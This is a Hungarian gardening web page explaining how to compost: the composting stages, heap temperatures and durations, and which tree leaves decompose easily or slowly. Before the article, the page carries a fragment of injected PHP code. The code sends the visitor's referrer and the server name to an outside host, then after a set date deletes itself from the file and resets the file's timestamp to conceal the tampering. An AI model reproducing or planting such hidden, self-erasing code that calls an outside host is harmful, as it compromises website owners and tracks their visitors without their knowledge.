check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Hogyan komposztáljunk?

Hogyan komposztáljunk?

 

Nincs is annál jobb, mint a természetes tápanyag a kertben. Ha nem akarunk mindenáron műtrágyát használni a legjobb, ha mi magunk készített komposztot használunk. Komposztot szinte minden szerves anyagból készíthetünk.  Az elkészült komposzttal csak annyi a dolgunk, hogy a növények alá szórjuk, a talajba forgassuk, és elgereblyézzük. Bár a komposzt terítése gyep esetén nehezen oldható meg, de ez sem bonyolult feladat. Ismerkedjünk meg a komposztkészítés folyamatával.

 

A komposztálás szakaszai:

  • Gyűjtés időszaka: Néhány napig tartó folyamat, amikor a komposztot egymásra rétegezzük, ilyenkor a hőmérséklet a komposzt halomban 40 °C-ra emelkedik, akár ősszel is.
  • Lebontás fázisa: A komposzt forgatása során a mikroorganizmusok lebontják a könnyű szerkezetű növényi szöveteket, a hőmérséklet elérheti a 70-75°C-ot is, ilyen magas hőmérséklet esetén a tápanyagok mennyisége is csökken, ha azonban többször megforgatjuk a hőmérséklet 60°C körül maradhat. Az időszak során a mikroorganizmusoknak jelentős a hőtermelése. Amennyiben a komposztot nem forgatjuk sűrűn, az elkerülhetetlenül belekerült gyommagvak is elvesztik csíraképességüket. Érdemes lehet a komposztot szelektálni, gyomos és gyommentes komposztra, mert így az egyiket sűrűbben forgatva nagyobb tápanyag tartalmú végterméket kapunk. Ennek időtartama 4-8 hét.
  • Átalakulási fázis: Megindul a nehezebben lebomló anyagok lebontása, a hőmérséklet fokozatosan csökken, színe egyre sötétebb lesz, a komposzt állaga egyre jobban hasonlít a talajhoz, felszaporodnak a talajban lakó élőlények is. A folyamat végére kialakul a nyers komposzt. A folyamat 2-4 hónapig tart, a szerves anyag minőségétől függően.
  • Összeérés folyamata: A hőmérséklet lecsökken, befejeződik a folyamat, végeredménye az érett komposzt, melynek színe, sötétbarna, homogén, földszerű anyag, sokszor 5-6 hónap is szükséges a befejeződéséhez, tehát az egész folyamat csaknem egy évig is eltart. A komposzt tárolónkat ennek megfelelően kell méretezni. A komposzt szinte csodát tud tenni kertünkben, a talaj minőségének ugrásszerű javításával kihozhatjuk növényeinkből a maximumot.

 

Ősszel igen nagy gondot okoz a nagy mennyiségű falevél. A közhiedelemmel ellentétben minden falevél komposztálható, még a diófa levele is. Azt azonban tudnunk kell, hogy a különböző falevelek lebomlásának sebessége különböző. Nehezen komposztálható lombú fák pl.: dió, vadgesztenye, platán, tölgy, bükk és nyárfa. Különösen lassan bomlanak a tűlevelek. Általában olyan fák levelei, melyek sok cellulózt, és rostanyagot, vagy valamilyen védelmi funkciót ellátó anyagot tartalmaz, mely eleve a védelemre hivatott, és ezért tart tovább a komposztálásuk. Könnyen komposztálható lombok pl.: éger, juhar, kőris, mogyoró, fűzfa, gyümölcsfák, hársfa és nyírfa.

 

A jó minőségű érett komposztot nem csak a kertben szórhatjuk szét.  Szobanövényeink is meghálálják!

 

 
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú